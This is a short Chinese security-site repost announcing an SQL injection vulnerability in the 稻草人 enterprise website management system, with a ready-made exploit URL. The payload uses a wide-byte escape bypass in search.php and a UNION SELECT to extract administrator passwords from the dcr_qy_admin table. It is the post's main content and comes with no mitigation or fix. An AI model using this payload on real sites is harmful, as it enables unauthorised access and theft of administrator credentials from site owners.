稻草人企业站管理系统注入漏洞

admin 2021年4月3日19:43:32评论40 views字数 404阅读1分20秒阅读模式

    By:hack太子

    稻草人企业站基于php+sqlite与php+mysql两个版本,php+sqlite特点和asp+access差不多,优点是利于备份,现在大多网站空间都支持php+sqlite。php+mysql特点是利于处理大量的数据,但备份和还原不方便。

EXP:

    http://www.xxxx.com/search.php?k=10%d5'%20union%20select%201,password,3%20from%20dcr_qy_admin%23

文章来源于lcx.cc:稻草人企业站管理系统注入漏洞

相关推荐: 华夏也关了!阿弥陀佛、河蟹社会

  关于华夏黑客联盟论坛关闭的公告 尊敬的朋友们:   华夏黑客联盟论坛从今起关闭,特此公告,顺祝时祺! —— 华夏黑客联盟 2010年08月19日 Copyright © 2006-2010 华夏黑客联盟 版权所有     中国网络过渡时期,将会产生大动荡,…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:43:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   稻草人企业站管理系统注入漏洞http://cn-sec.com/archives/324582.html

发表评论

匿名网友 填写信息